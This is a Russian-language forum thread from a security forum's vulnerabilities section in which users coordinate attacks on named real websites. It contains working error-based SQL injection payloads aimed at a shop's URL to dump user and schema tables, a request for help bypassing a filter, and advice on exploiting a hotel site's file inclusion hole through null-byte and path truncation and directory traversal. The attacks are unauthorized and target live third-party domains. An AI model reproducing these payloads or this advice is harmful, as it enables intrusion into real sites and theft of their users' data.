HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1531  
Старый 05.12.2016, 13:19
mlmeet
Guest
Сообщений: n/a
Провел на форуме:
1314

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
Спасибо, уже разобралась))))
 
Ответить с цитированием

  #1532  
Старый 05.12.2016, 13:50
mlmeet
Guest
Сообщений: n/a
Провел на форуме:
1314

Репутация: 0
По умолчанию

Ребята, как листать записи при такой инъекции? Что то совсем не получается

http://stylesosh.ru/Orangevaya-tols...cat(name),1,1024)from(tehnocity_user))))and '/

XPATH syntax error: ':quest,' -

SELECT * FROM `tehnocity_menu` WHERE `sim_link`='Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+m id(group_concat(name),1,1024)from(tehnocity_user)) ))and'' LIMIT 0, 1

Ясно как листать.. Там всего один юзер в этой таблице((((

/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat

(user_id,0x3a,name,0x3a),1,1024)from(users)where(u ser_id)=(1))))and'/
 
Ответить с цитированием

  #1533  
Старый 05.12.2016, 15:12
mlmeet
Guest
Сообщений: n/a
Провел на форуме:
1314

Репутация: 0
По умолчанию

http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat(0x3a,table_name,0x3a),1,1024)from( information_schema.tables))))and'/

Не пропускает точку((((((( Как быть????? Хексить пробовала, не выходит. Посоветуйте пожалуйста.

Попробовала сбрутить таблицы по словарю с античата.. Ничего нормального не удалось вытащить((
 
Ответить с цитированием

  #1534  
Старый 06.12.2016, 17:43
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Что можно сделать с этим сайтом?

http://hotel-stalingrad.ru/index.php?page=cafe

У меня ничего не получается,кто подскажет с чего раскрутить можно?
 
Ответить с цитированием

  #1535  
Старый 06.12.2016, 19:08
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

Что можно сделать с этим сайтом?
http://hotel-stalingrad.ru/index.php?page=cafe
У меня ничего не получается,кто подскажет с чего раскрутить можно?
null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать
 
Ответить с цитированием

  #1536  
Старый 06.12.2016, 19:52
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать
работает, там другая проблема
 
Ответить с цитированием

  #1537  
Старый 06.12.2016, 19:54
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

работает, там другая проблема
неа, не работает

я проверил подключив admin/index.php%00 - не подключился

admin/index - подключает

---------

в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз

в чем там может быть проблема?
 
Ответить с цитированием

  #1538  
Старый 06.12.2016, 20:10
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?
Точно .
 
Ответить с цитированием

  #1539  
Старый 06.12.2016, 20:10
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?
У меня даже admin/index - не подключает
 
Ответить с цитированием

  #1540  
Старый 06.12.2016, 20:27
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

У меня даже admin/index - не подключает
потому что ../admin/index

php/ лишняя директория
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ